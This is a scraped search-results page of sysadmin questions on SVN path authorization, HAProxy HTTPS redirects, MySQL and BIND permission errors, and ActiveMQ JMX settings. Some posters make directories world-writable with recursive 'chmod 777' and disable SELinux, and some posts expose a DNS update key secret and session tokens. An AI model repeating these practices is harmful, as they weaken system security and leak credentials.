Search Results

Search found 1981 results on 80 pages for 'trick jarrett'.

Page 77/80 | < Previous Page | 73 74 75 76 77 78 79 80  | Next Page >

  • Using AuthzSVNAccessFile for controlling SVN Access produces HTTP 400 Bad Request

    - by meeper
    I have a new repository on an existing subversion server that requires us to perform path based authorization within the repository. I found that the AuthzSVNAccessFile directive in apache is directly responsible for allowing this functionality. After fixing several other problems such as AuthzSVNAccessFile preventing SVNListParentPath from operating properly, I am left with one single problem. I can checkout, I can update, I can commit, BUT I cannot execute an SVN COPY for performing branch/tagging operations. The moment I comment out the AuthzSVNAccessFile line in the Apache config everything works as expected except the obvious path authorizations. Versions: The server OS is Debian 6.0.7 (Squeeze) Apache 2.2.16-6+squeeze11 Server Subversion 1.6.12dfsg-7 Clients are running windows Clients tried are: TortoiseSVN 1.8.2 Build 24708 64bit SVN CLI Client 1.8.3 (r1516576) Authentication is performed via AD to a Windows 2003 domain and appears to be operating normally. I have stripped out all other configurations and repository setups to produce this single configuration that reproduces the problem. Apache Configuration: <VirtualHost *:443> ServerName svn-test.company.com ServerAlias /svn-test ServerAdmin [email protected] SSLEngine On SSLCertificateFile /etc/apache2/apache.pem ErrorLog /var/log/apache2/svn-test_error.log LogLevel warn CustomLog /var/log/apache2/svn-test_access.log combined ServerSignature On # Repository Access to all Repositories <Location "/"> DAV svn SVNParentPath /var/svn SVNListParentPath on AuthBasicProvider ldap AuthType Basic AuthzLDAPAuthoritative Off AuthName "Subversion Test Repository System" AuthLDAPURL "ldap://adserver.company.com:389/DC=corp,DC=company,DC=com?sAMAccountName?sub?(objectClass=*)" NONE AuthLDAPBindDN "CN=service_account,OU=ServiceIDs,OU=corp,OU=Delegated,DC=na,DC=corp,DC=company,DC=com" AuthLDAPBindPassword service_account_password Require valid-user SSLRequireSSL </Location> # <LocationMatch /.+> is a really dirty trick to make listing of repositories work # http://d.hatena.ne.jp/shimonoakio/20080130/1201686016 <LocationMatch /.+> AuthzSVNAccessFile /etc/apache2/svn_path_auth </LocationMatch> </VirtualHost> SVN Access File: [/] * = rw The repository used (AuthTestBasic) consists of the following directory structure and contains no externals (this is a literal listing, not an example): / /branches/ /tags/ /trunk/ /trunk/somefile.txt Tortoise produces the following error during a tag operation in it's tag result window: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request) The svn.exe CLI client produces the following error: C:\Users\e20epkt>svn copy https://servername/authtestbasic/trunk https://servername/authtestbasic/tags/tag1 -m "svn cli client" svn: E175002: Adding directory failed: COPY on /authtestbasic/!svn/bc/2/trunk (400 Bad Request) The Apache error log has nothing in it, however the apache access log has the following in it (IP addresses and usernames changed obviously): 10.1.2.100 - - [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 401 2595 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 996 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "OPTIONS /authtestbasic/trunk HTTP/1.1" 200 884 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/trunk HTTP/1.1" 207 692 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/0/trunk HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/vcc/default HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "REPORT /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 200 674 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 207 548 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags/tag1 HTTP/1.1" 404 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "MKACTIVITY /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPFIND /authtestbasic/tags HTTP/1.1" 207 580 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/vcc/default HTTP/1.1" 201 708 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "PROPPATCH /authtestbasic/!svn/wbl/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e/2 HTTP/1.1" 207 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "CHECKOUT /authtestbasic/!svn/ver/1/tags HTTP/1.1" 201 724 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "COPY /authtestbasic/!svn/bc/2/trunk HTTP/1.1" 400 596 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" 10.1.2.100 - myuseraccount [17/Oct/2013:11:53:40 -0700] "DELETE /authtestbasic/!svn/act/f1e9dc07-fb5e-5a41-ac22-907705ef6e5e HTTP/1.1" 204 1956 "-" "SVN/1.8.3 (x64-microsoft-windows) serf/1.3.1 TortoiseSVN-1.8.2.24708" You'll see that the second to last line contains the COPY command with the HTTP 400 response, however, there doesn't appear to be any indication as to why. Please note that, while yes this is a test repository on a test server, I am experiencing this same issue in this test setup where I have eliminated all other possible causes (mixed repository configurations, externals, etc). I have also confirmed that all files for the repository (/var/svn/authtestbasic) are owned by the Apache user www-data.

    Read the article

  • Getting HAPROXY to redirect http to https in users browser session

    - by Jon
    We are currently using a Internet cloud provider to host our SaaS platform. The platform consists of a Firewall - Cloud Provider SLB - - Apache Web Server - HAPROXY SLB - Liferay Platform We have had to use HAPROXY because of an issue with the cloud providers SLB that meant we were unable to use it for load balancing the Liferay platform applications. I have implemented HAPROXY in our secure tier and that seems to do the trick of load balancing the requests quite adequately. However during testing we encountered a functional issue whereby selecting a sub-menu from the web portal resulted in the application hanging, using an http analyser we saw that the request being passed back to the users browser was in http, from discussing this with the software vendor it transpires that the Liferay application has some hard-coded http links, and that other customers have worked around this by using physical NLB's such as F5 and redirecting the http traffic to https. The entry in the HAPROXY logs reads: haproxy[2717]: haproxy[2717]: <Apache Web Agent>:37957 [11/Apr/2013:08:07:00.128] http-uapi uapi/<ServerName> 0/0/0/9/10 200 4912 - - ---- 4/2/1/2/0 0/0 "GET /servicedesk/controller?docommand=renderradform&!key=esd_sfb001_frm_feedback_forms_list&isportalintegratedmode=true&USR=joe.bloggs%40gmail.com&_dc=1365667773097&redirecturl=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_SFB001_FRM_FEEDBACK_FORMS_LIST%26isportalintegratedmode%3Dtrue&sso_token=ALiYv2UqzLsAhSw1ZchRDlCHlq44Bhj9&ONERROR=%2Fweb%2Fjsp%2Fapps%2Fportal-integration-error.jsp&itype=login&slicetoken=NW51O%242aRo%2C_Zz%2476P_9DTtnFmz6%28bhk&AUTOFORWARDURL=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_SFB001_FRM_FEEDBACK_FORMS_LIST%26isportalintegratedmode%3Dtrue&LOGINPAGE=https%3A%2F%2F<FQDN of Web Portal>%2Fweb%2F4732cf01-82c3-4bc5-b6c9-552253e672cf%2Fworkflow-tools&appid=1&!uid=1&!redownloadToken=7.0.3.1.1363611301.0&userlocale=en_US&!datechanged=2012-05-18%2015:05:31.38 HTTP/1.1" :37957 [11/Apr/2013:08:07:00.128] http-uapi uapi/<ServerName> 0/0/0/9/10 200 4912 - - ---- 4/2/1/2/0 0/0 "GET /servicedesk/controller?docommand=renderradform&!key=esd_sfb001_frm_feedback_forms_list&isportalintegratedmode=true&USR=joe.bloggs%40gmail.com&_dc=1365667773097&redirecturl=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_SFB001_FRM_FEEDBACK_FORMS_LIST%26isportalintegratedmode%3Dtrue&sso_token=ALiYv2UqzLsAhSw1ZchRDlCHlq44Bhj9&ONERROR=%2Fweb%2Fjsp%2Fapps%2Fportal-integration-error.jsp&itype=login&slicetoken=NW51O%242aRo%2C_Zz%2476P_9DTtnFmz6%28bhk&AUTOFORWARDURL=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_SFB001_FRM_FEEDBACK_FORMS_LIST%26isportalintegratedmode%3Dtrue&LOGINPAGE=https%3A%2F%2F<FQDN of Web Portal>%2Fweb%2F4732cf01-82c3-4bc5-b6c9-552253e672cf%2Fworkflow-tools&appid=1&!uid=1&!redownloadToken=7.0.3.1.1363611301.0&userlocale=en_US&!datechanged=2012-05-18%2015:05:31.38 HTTP/1.1" The corresponding HTTP browser entry shows: http://<FQDN of ServiceDesk>/servicedesk/controller?docommand=renderradform&!key=esd_org019_frm_contact_list&isportalintegratedmode=true&USR=joe.bloggs%40gmail.com&_dc=1365665987887&redirecturl=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_ORG019_FRM_CONTACT_LIST%26isportalintegratedmode%3Dtrue&sso_token=3NxsXYORMPp32SwL8ftVUCMH2QdWLH82&ONERROR=%2Fweb%2Fjsp%2Fapps%2Fportal-integration-error.jsp&itype=login&slicetoken=NW51O%242aRo%2C_Zz%2476P_9DTtnFmz6%28bhk&AUTOFORWARDURL=controller%3Fdocommand%3Drenderbody%26%21key%3DESD_ORG019_FRM_CONTACT_LIST%26isportalintegratedmode%3Dtrue&LOGINPAGE=https%3A%2F%2F<FQDN of Web Portal>>%2Fweb%2F4732cf01-82c3-4bc5-b6c9-552253e672cf%2Fapplication-setup&appid=1&!uid=1&!redownloadToken=7.0.3.1.1363611301.0&userlocale=en_US&!datechanged=2012-10-26%2019:00:25.08 From reading through the forums and other sites it looks like we should be use to use HAPROXY to redirect the traffic to https, but try as I might I cant get it to work. This is our HAPROXY configuration: global log 127.0.0.1 local2 chroot /var/lib/haproxy pidfile /var/run/haproxy.pid maxconn 4000 user haproxy group haproxy daemon stats socket /var/lib/haproxy/stats defaults mode http log global option httplog option dontlognull option http-server-close option forwardfor except 127.0.0.0/8 option redispatch retries 3 timeout http-request 10s timeout queue 1m timeout connect 10s timeout client 1m timeout server 1m timeout http-keep-alive 10s timeout check 10s maxconn 3000 frontend http-openfire bind *:7070 default_backend openfire backend openfire balance roundrobin server <serverName> <IPv4 Address>:7070 check server <serverName> <IPv4 Address>:7070 check frontend http-uapi bind *:7080 default_backend uapi backend uapi balance roundrobin server <serverName> <IPv4 Address>:7080 check server <serverName> <IPv4 Address>:7080 check frontend http-sec bind *:8080 default_backend sec backend sec balance roundrobin server <serverName> <IPv4 Address>:8080 check server <serverName> <IPv4 Address>:8080 check frontend http-wall bind *:9080 default_backend wall backend wall balance roundrobin server <serverName> <IPv4 Address>:9080 check server <serverName> <IPv4 Address>:9080 check frontend http-xmpp bind *:9090 default_backend xmpp backend xmpp balance roundrobin server <serverName> <IPv4 Address>:9090 check server <serverName> <IPv4 Address>:9090 check frontend http-aim bind *:10080 default_backend aim backend aim balance roundrobin server <serverName> <IPv4 Address>:10080 check server <serverName> <IPv4 Address>:10080 check frontend http-servicedesk bind *:8081 default_backend servicedesk backend servicedesk balance roundrobin server <serverName> <IPv4 Address>:8081 check server <serverName> <IPv4 Address>:8081 check listen stats :1936 mode http stats enable stats hide-version stats realm Haproxy\ Statistics stats uri / stats auth haproxy:<Password> I have tried following the articles listed posted on http://stackoverflow.com/questions/13227544/haproxy-redirecting-http-to-https-ssl and http://parsnips.net/haproxy-http-to-https-redirect/ but that hasn't made any difference. Am I on the right track with this or are we trying to achieve the impossible?, I'm hoping I'm just being an idiot and one of you good people can point me in the right direction.

    Read the article

  • Launching mysql server: same permissions for root and for user

    - by toinbis
    Hi folks, have been directed here from stackoverflow here, am reposting the question and adding my.cnf at the end of a post. so far in my 10+ years experience with linux, all the permission problems I've ever encountered, have been successfully solved with chmod -R 777 /path/where/the/problem/has/occured (every lie has a grain of truth in it :) This time the trick doesn't work, so I'm turning to you for help. I'm compiling mysql server from scratch with zc.buildout (www . buildout . org). I do launch it by executing /home/toinbis/.../parts/mysql/bin/mysqld_safe, this works. The thing is that i'll be launching this from within supervisor (supervisord . org) script, and when used on the deployment server, it'll need it to be launched with root permissions(so that nginx server, launched with the same script, would have access to 80 port). The problem is that sudo /home/toinbis/.../parts/mysql/bin/mysqld_safe, fails, generating the error, posted bellow, in mysql error log (apache and nginx works as expected). http://lists.mysql.com/mysql/216045 suggests, that "there are two errors: A missing table and a file system that mysqld doesn't have access to". Mysqldatadir and all the mysql server binary files has 777 permissions, talbe mysql.plugin does exist and has 777 permissions (why Can't open the mysql.plugin table?), "sudo touch mysql_datadir/tmp/file" does create file (why Can't create/write to file /home/toinbis/.../runtime/mysql_datadir/tmp/ib4e9Huz?). chgrp -R mysql mysql_datadir and adding "root, toinbis, mysql" users to mysql group ( cat /etc/group | grep mysql outputs mysql:x:124:root,toinbis,mysql) has no effect - when i launch it as a casual user, it starts, when as a root - it fails. Does mysql server, even started as root, tries to operate as other, let's say, 'mysql' user? but even in that case, adding mysql user to mysql group and making all the mysql_datadirs files belong to mysql group should make things work smoothly. I do know that it might be a better idea to simply to launch one the nginx as root and mysql - as just a user, but this error irritated me enough so to devote enough energy so not to only "make things work", but to also make things work exactly as i wanted it initially, so to have a proof of concept that it's possible. and this is the generated error: 091213 20:02:55 mysqld_safe Starting mysqld daemon with databases from /home/toinbis/.../runtime/mysql_datadir /home/toinbis/.../parts/mysql/libexec/mysqld: Table 'plugin' is read only 091213 20:02:55 [ERROR] Can't open the mysql.plugin table. Please run mysql_upgrade to create it. /home/toinbis/.../parts/mysql/libexec/mysqld: Can't create/write to file '/home/toinbis/.../runtime/mysql_datadir/tmp/ib4e9Huz' (Errcode: 13) 091213 20:02:55 InnoDB: Error: unable to create temporary file; errno: 13 091213 20:02:55 [ERROR] Plugin 'InnoDB' init function returned error. 091213 20:02:55 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed. 091213 20:02:55 [ERROR] Can't start server : Bind on unix socket: Permission denied 091213 20:02:55 [ERROR] Do you already have another mysqld server running on socket: /home/toinbis/.../runtime/var/pids/mysql.sock ? 091213 20:02:55 [ERROR] Aborting 091213 20:02:55 [Note] /home/toinbis/.../parts/mysql/libexec/mysqld: Shutdown complete 091213 20:02:55 mysqld_safe mysqld from pid file /home/toinbis/.../runtime/var/pids/mysql.pid ended My my.cnf (the basedir and datadir(including tempdir) have chmod -R 777 permissions) : [client] socket = /home/toinbis/.../runtime/var/pids/mysql.sock port = 8002 [mysqld_safe] socket = /home/toinbis/.../runtime/var/pids/mysql.sock nice = 0 [mysqld] # # * Basic Settings # socket = /home/toinbis/.../runtime/var/pids/mysql.sock port = 8002 pid-file = /home/toinbis/.../runtime/var/pids/mysql.pid basedir = /home/toinbis/.../parts/mysql datadir = /home/toinbis/.../runtime/mysql_datadir tmpdir = /home/toinbis/.../runtime/mysql_datadir/tmp skip-external-locking bind-address = 127.0.0.1 log-error =/home/toinbis/.../runtime/logs/mysql_errorlog # # * Fine Tuning # key_buffer = 16M max_allowed_packet = 32M thread_stack = 128K thread_cache_size = 8 myisam-recover = BACKUP #max_connections = 100 #table_cache = 64 #thread_concurrency = 10 # # * Query Cache Configuration # query_cache_limit = 1M query_cache_size = 16M # # * Logging and Replication # # Both location gets rotated by the cronjob. # Be aware that this log type is a performance killer. #log = /home/toinbis/.../runtime/logs/mysql_logs/mysql.log # # Error logging goes to syslog. This is a Debian improvement :) # # Here you can see queries with especially long duration #log_slow_queries = /home/toinbis/.../runtime/logs/mysql_logs/mysql-slow.log #long_query_time = 2 #log-queries-not-using-indexes # # The following can be used as easy to replay backup logs or for replication. #server-id = 1 #log_bin = /home/toinbis/.../runtime/mysql_datadir/mysql-bin.log #binlog_format = ROW #read_only = 0 #expire_logs_days = 10 #max_binlog_size = 100M #sync_binlog = 1 #binlog_do_db = include_database_name #binlog_ignore_db = include_database_name # # * InnoDB # innodb_data_file_path = ibdata1:10M:autoextend innodb_buffer_pool_size=64M innodb_log_file_size=16M innodb_log_buffer_size=8M innodb_flush_log_at_trx_commit=1 innodb_file_per_table innodb_locks_unsafe_for_binlog=1 [mysqldump] quick quote-names max_allowed_packet = 32M [mysql] #no-auto-rehash # faster start of mysql but no tab completion [isamchk] key_buffer = 16M Any ideas much appreciated! regards, to P.S. sorry for messy hyperlinks, it's my first post and anti-spam feature of SF doesn't allow to post them properly :)

    Read the article

  • DDNS Not Creating Journal (Dhcpd and Named)

    - by user130094
    * EDIT 1 * After monkeying with additional debug logging I see some log entries of interest. 27-Jul-2012 23:45:26.537 general: error: zone example.lan/IN/internal: journal rollforward failed: no more 27-Jul-2012 23:45:26.537 general: error: zone example.lan/IN/internal: not loaded due to errors. ^^^ If I can remedy the above messages I think I'll be good to go ^^^ * EDIT 2 * Grasping at straws I touched a forward and a reverse zone journal file and restarted named. Boom! Works. Despite documentation stating the files are created automatically and what I have seen before... dunno why but that did the trick. Also re-checked perms on the dir the files live in. As certain as I was, they were correct with named having rw. CentOS 6 (final) dhcpd 4.1.1-P1 named BIND 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6 Basic DHCP and DNS functionality are in place on 192.168.111.2. Clients are assigned addresses as intended and can resolve local DNS names as well as Internet names. My problem is that named's zone journal files are not created. chroot: /var/named/chroot I tried placing the zone files in various directories (/var/named/data, /var/named, /var/named/dynamic - no matter which dir with named owning and wide open perms I now get nowhere). Along the way I, at one point, got a permission denied when named tried to create the journal. Resolved the issue by: chown --recursive named:named /var/named chmod --recursive 777 /var/named The journal was then created and here's where things fell apart. I attempted to tame permissions to something more sane and broke it. Once changed and having restarted named it threw an error indicating the journal was out of sync (or something to that affect)... didn't matter since this is a new setup so I deleted it and now it is not recreated. Now though I see no errors in /var/log/messages, my chrooted /var/log/named.log, or chrooted /var/log/named.debug. I increased the debug level with 'rndc trace' - no love. Increased trace to 10, still nothing. SELinux is disabled... [root@server temp]# sestatus SELinux status: disabled dhcpd.conf... allow client-updates; ddns-update-style interim; subnet 192.168.111.0 netmask 255.255.255.224 { ... key dhcpudpate { algorithm hmac-md5; secret LDJMdPdEZED+/nN/AGO9ZA==; } zone example.lan. { primary 192.168.111.2; key dhcpudpate; } } named.conf... key dhcpudpate { algorithm hmac-md5; secret "LDJMdPdEZED+/nN/AGO9ZA=="; }; zone "example.lan" { type master; file "/var/named/dynamic/example.lan.db"; allow-transfer { none; }; allow-update { key dhcpudpate; }; notify false; check-names ignore; }; The following shows /var/log/named.log output of named starting up - no errors. 27-Jul-2012 21:33:39.349 general: info: zone 111.168.192.in-addr.arpa/IN/internal: loaded serial 2012072601 27-Jul-2012 21:33:39.349 general: info: zone example.lan/IN/internal: loaded serial 2012072501 27-Jul-2012 21:33:39.350 general: info: zone example2.lan/IN/internal: loaded serial 2012072501 27-Jul-2012 21:33:39.350 general: info: zone example3.lan/IN/internal: loaded serial 2012072601 27-Jul-2012 21:33:39.350 general: info: zone example4.lan/IN/internal: loaded serial 2012072501 27-Jul-2012 21:33:39.351 general: info: zone example5.lan/IN/internal: loaded serial 2012072501 27-Jul-2012 21:33:39.351 general: info: managed-keys-zone ./IN/internal: loaded serial 0 27-Jul-2012 21:33:39.351 general: info: zone example.lan/IN/external: loaded serial 2012072501 27-Jul-2012 21:33:39.352 general: info: zone example1.lan/IN/external: loaded serial 2012072501 27-Jul-2012 21:33:39.352 general: info: zone example2.lan/IN/external: loaded serial 2012072501 27-Jul-2012 21:33:39.352 general: info: zone example3.lan/IN/external: loaded serial 2012072501 27-Jul-2012 21:33:39.353 general: info: managed-keys-zone ./IN/external: loaded serial 0 27-Jul-2012 21:33:39.353 general: notice: running 27-Jul-2012 21:34:03.825 general: info: received control channel command 'trace 10' 27-Jul-2012 21:34:03.825 general: info: debug level is now 10 ...and /var/log/messages for a named start... Jul 27 23:02:04 server named[9124]: ---------------------------------------------------- Jul 27 23:02:04 server named[9124]: BIND 9 is maintained by Internet Systems Consortium, Jul 27 23:02:04 server named[9124]: Inc. (ISC), a non-profit 501(c)(3) public-benefit Jul 27 23:02:04 server named[9124]: corporation. Support and training for BIND 9 are Jul 27 23:02:04 server named[9124]: available at https://www.isc.org/support Jul 27 23:02:04 server named[9124]: ---------------------------------------------------- Jul 27 23:02:04 server named[9124]: adjusted limit on open files from 4096 to 1048576 Jul 27 23:02:04 server named[9124]: found 2 CPUs, using 2 worker threads Jul 27 23:02:04 server named[9124]: using up to 4096 sockets Jul 27 23:02:04 server named[9124]: loading configuration from '/etc/named.conf' Jul 27 23:02:04 server named[9124]: using default UDP/IPv4 port range: [1024, 65535] Jul 27 23:02:04 server named[9124]: using default UDP/IPv6 port range: [1024, 65535] Jul 27 23:02:04 server named[9124]: listening on IPv4 interface eth0, 192.168.111.2#53 Jul 27 23:02:04 server named[9124]: generating session key for dynamic DNS Jul 27 23:02:04 server named[9124]: sizing zone task pool based on 12 zones Jul 27 23:02:04 server named[9124]: set up managed keys zone for view internal, file 'dynamic/3bed2cb3a3acf7b6a8ef408420cc682d5520e26976d354254f528c965612054f.mkeys' Jul 27 23:02:04 server named[9124]: set up managed keys zone for view external, file 'dynamic/3c4623849a49a53911c4a3e48d8cead8a1858960bccdea7a1b978d73ec2f06d7.mkeys' Jul 27 23:02:04 server named[9124]: command channel listening on 127.0.0.1#953 What can I do to troubleshoot this further? It almost seems as though dhcpd is not triggering the update. Maybe I should troubleshoot here and, if so, how? Many thanks.

    Read the article

  • HOWTO: disable jmx in activemq network of brokers (spring, xbean)

    - by subes
    Since I've struggled a lot with this problem, I am posting my solution. Disabling jmx in an activemq network of brokers removes race conditions about the registration of the jmx connector. When starting multiple activemq servers on the same machine: Failed to start jmx connector: Cannot bind to URL [rmi://localhost:1099/jmxrmi]: javax.naming.NameAlreadyBoundException: jmxrmi [Root exception is java.rmi.AlreadyBoundException: jmxrmi] Another problem with this is, that even if you don't cause a race condition, this exception can still occur. Even when starting one broker after another while waiting for them to initialize properly in between. If one process is run by root as the first instance and the other as a normal user, somehow the user process tries to register its own jmx connector, though there already is one. Or another exception which happens when the broker that successfully registered the jmx connector goes down: Failed to start jmx connector: Cannot bind to URL [rmi://localhost:1099/jmxrmi]: javax.naming.ServiceUnavailableException [Root exception is java.rmi.ConnectException: Connection refused to host: localhost; nested exception is: java.net.ConnectException: Connection refused] Those exceptions cause the network of brokers to stop working, or to not work at all. The trick to disable jmx was, that jmx had to be disabled in the connectionfactory aswell. The documentation http://activemq.apache.org/jmx.html does not say that this is needed explicitly. So I had to struggle for 2 days until I found the solution: <beans xmlns="http://www.springframework.org/schema/beans" xmlns:amq="http://activemq.apache.org/schema/core" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://activemq.apache.org/schema/core http://activemq.apache.org/schema/core/activemq-core-5.3.1.xsd"> <!-- Spring JMS Template --> <bean id="jmsTemplate" class="org.springframework.jms.core.JmsTemplate"> <constructor-arg ref="connectionFactory" /> </bean> <!-- Caching, sodass das jms template überhaupt nutzbar ist in sachen performance --> <bean id="connectionFactory" class="org.springframework.jms.connection.CachingConnectionFactory"> <constructor-arg ref="amqConnectionFactory" /> <property name="exceptionListener" ref="jmsExceptionListener" /> <property name="sessionCacheSize" value="1" /> </bean> <!-- Jeder Client verbindet sich mit seinem eigenen broker, broker sind untereinander vernetzt. Nur wenn hier nochmals jmx deaktiviert wird, bleibt es auch deaktiviert... --> <amq:connectionFactory id="amqConnectionFactory" brokerURL="vm://broker:default?useJmx=false" /> <!-- Broker suchen sich einen eigenen Port und sind gegenseitig verbunden, ergeben dadurch ein Grid. Dies zwar etwas langsamer, aber dafür ausfallsicherer. Siehe http://activemq.apache.org/networks-of-brokers.html --> <amq:broker useJmx="false" persistent="false"> <!-- Wird benötigt um JMX endgültig zu deaktivieren --> <amq:managementContext> <amq:managementContext connectorHost="localhost" createConnector="false" /> </amq:managementContext> <!-- Nun die normale Konfiguration für Network of Brokers --> <amq:networkConnectors> <amq:networkConnector networkTTL="1" duplex="true" dynamicOnly="true" uri="multicast://default" /> </amq:networkConnectors> <amq:persistenceAdapter> <amq:memoryPersistenceAdapter /> </amq:persistenceAdapter> <amq:transportConnectors> <amq:transportConnector uri="tcp://localhost:0" discoveryUri="multicast://default" /> </amq:transportConnectors> </amq:broker> With this, there is no need to specify -Dcom.sun.management.jmxremote=false for the jvm. Which somehow also didn't work for me, because the connectionfactory started the jmx connector.

    Read the article

  • Android 1.5 - 2.1 Search Activity affects Parent Lifecycle

    - by pacoder
    Behavior seems consistent in Android 1.5 to 2.1 Short version is this, it appears that when my (android search facility) search activity is fired from the android QSR due to either a suggestion or search, UNLESS my search activity in turn fires off a VISIBLE activity that is not the parent of the search, the search parents life cycle changes. It will NOT fire onDestroy until I launch a visible activity from it. If I do, onDestroy will fire fine. I need a way to get around this behavior... The long version: We have implemented a SearchSuggestion provider and a Search activity in our application. The one thing about it that is very odd is that if the SearchManager passes control to our custom Search activity, AND that activity does not create a visible Activity the Activity which parented the search does not destroy (onDestroy doesn't run) and it will not until we call a visible Activity from the parent activity. As long as our Search Activity fires off another Activity that gets focus the parent activity will fire onDestroy when I back out of it. The trick is that Activity must have a visual component. I tried to fake it out with a 'pass through' Activity so that my Search Activity could fire off another Intent and bail out but that didn't work either. I have tried setting our SearchActivity to launch singleTop and I also tried setting its noHistory attribute to true, tried setResult(RESULT_OK) in SearchACtivity prior to finish, bunch of other things, nothing is working. This is the chunk of code in our Search Activity onCreate. Couple of notes about it: If Intent is Action_Search (user typed in their own search and didn't pick a suggestion), we display a list of results as our Search Activity is a ListActivity. In this case when the item is picked, the Search Activity closes and our parent Activity does fire onDestroy() when we back out. If Intent is Action_View (user picked a suggestion) when type is "action" we fire off an Intent that creates a new visible Activity. In this case same thing, when we leave that new activity and return to the parent activity, the back key does cause the parent activity to fire onDestroy when leaving. If Intent is Action_View (user picked a suggestion) when type is "pitem" is where the problem lies. It works fine (the method call focuses an item on the parent activity), but when the back button is hit on the parent activity onDestroy is NOT called. IF after this executes I pick an option in the parent activity that fires off another activity and return to the parent then back out it will fire onDestroy() in the parent activity. Note that the "action" intent ends up running the exact same method call as "pitem", it just bring up a new visual Activity first. Also I can take out the method call from "pitem" and just finish() and the behavior is the same, the parent activity doesn't fire onDestroy() when backed out of. if (Intent.ACTION_SEARCH.equals(queryAction)) { this.setContentView(_layoutId); String searchKeywords = queryIntent.getStringExtra(SearchManager.QUERY); init(searchKeywords); } else if(Intent.ACTION_VIEW.equals(queryAction)){ Bundle bundle = queryIntent.getExtras(); String key = queryIntent.getDataString(); String userQuery = bundle.getString(SearchManager.USER_QUERY); String[] keyValues = key.split("-"); if(keyValues.length == 2) { String type = keyValues[0]; String value = keyValues[1]; if(type.equals("action")) { Intent intent = new Intent(this, EventInfoActivity.class); Long longKey = Long.parseLong(value); intent.putExtra("vo_id", longKey); startActivity(intent); finish(); } else if(type.equals("pitem")) { Integer id = Integer.parseInt(value); _application._servicesManager._mapHandlerSelector.selectInfoItem(id); finish(); } } } It just seems like something is being held onto and I can't figure out what it is, in all cases the Search Activity fires onDestroy() when finish() is called so it is definitely going away. If anyone has any suggestions I'd be most appreciative. Thanks, Sean Overby

    Read the article

  • adobe flash buider (flex4): Error #2025 or Error: addChild() is not available in this class. Instead

    - by user306584
